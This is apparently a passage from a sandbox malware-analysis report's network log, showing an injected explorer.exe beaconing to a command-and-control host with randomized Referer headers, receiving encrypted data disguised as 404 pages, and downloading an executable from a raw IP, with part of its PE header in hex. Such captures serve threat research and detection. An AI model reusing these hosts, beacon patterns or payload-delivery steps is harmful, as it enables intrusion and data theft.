                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://iauswed.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 239
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:20.201127052 CET16326INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:20 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  33192.168.2.5498035.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:20.593352079 CET16326OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://schieym.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 319
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:20.713779926 CET16327INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:20 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  34192.168.2.5498045.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:20.834049940 CET16328OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hyjcl.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 200
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:20.947932005 CET16329INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:20 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 2bI:82OI<\FF2K90


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  35192.168.2.549805185.7.214.1718080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:21.022022009 CET16329OUTGET /6.php HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: 185.7.214.171:8080
                                                                                                                                  Jan 11, 2022 23:38:21.082618952 CET16331INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:21 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                                                  Content-Transfer-Encoding: Binary
                                                                                                                                  Content-disposition: attachment; filename="r5sbohyquddm.exe"
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Data Raw: 34 38 65 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db e7 80 7e 9f 86 ee 2d 9f 86 ee 2d 9f 86 ee 2d 81 d4 7b 2d 88 86 ee 2d 81 d4 6d 2d 19 86 ee 2d 81 d4 6a 2d b1 86 ee 2d b8 40 95 2d 98 86 ee 2d 9f 86 ef 2d 12 86 ee 2d 81 d4 64 2d 9e 86 ee 2d 81 d4 7a 2d 9e 86 ee 2d 81 d4 7f 2d 9e 86 ee 2d 52 69 63 68 9f 86 ee 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f6 fe b3 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 18 01 00 00 f2 03 00 00 00 00 00 07 2f 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 93 8d 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 5e 01 00 50 00 00 00 00 40 04 00 50 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 51 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 53 16 01 00 00 10 00 00 00 18 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 37 00 00 00 30 01 00 00 38 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 cc 02 00 00 70 01 00 00 6c 02 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 cd 00 00 00 40 04 00 00 ce 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: 48e00MZ@!L!This program cannot be run in DOS mode.$~---{--m--j--@----d--z----Rich-PEL_/0@8^P@P1Q@0.textS `.rdata708@@.dataxplT@.rsrcP@@@


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  36192.168.2.5498065.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:24.550565958 CET16640OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tilkkrykmo.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 168
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:24.667705059 CET16641INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:24 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  37192.168.2.5498075.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:24.920850039 CET16642OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://foranher.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 155
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:25.034349918 CET16642INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:24 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  38192.168.2.5498085.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:26.052977085 CET16643OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ojvqrvcy.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 198
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:26.174818039 CET16644INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:26 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  39192.168.2.5498115.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:28.141412973 CET17202OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://cbsmoqe.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 259
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:28.252067089 CET17203INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.549873144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  40192.168.2.5498125.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:28.355168104 CET17204OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pxquxmnlu.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 267
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:28.477314949 CET17205INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  41192.168.2.5498135.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:28.881571054 CET17205OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://huwmmurp.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 237
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:29.000869989 CET17206INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 2cI:82OI:D@EnW[10


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  42192.168.2.5498485.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:50.205689907 CET17316OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nrqocneu.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 184
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:50.332703114 CET17316INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:50 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  43192.168.2.5498495.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:50.436284065 CET17317OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://svnsu.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 315
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:50.562731981 CET17318INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:50 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  44192.168.2.5498505.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:50.734442949 CET17319OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://oqsvas.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 323
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:50.853703976 CET17319INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:50 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  45192.168.2.5498515.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:50.964576006 CET17320OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://wxpgf.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 198
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:51.087907076 CET17321INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:51 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  46192.168.2.5498525.188.88.18480C:\Windows\explorer.exe
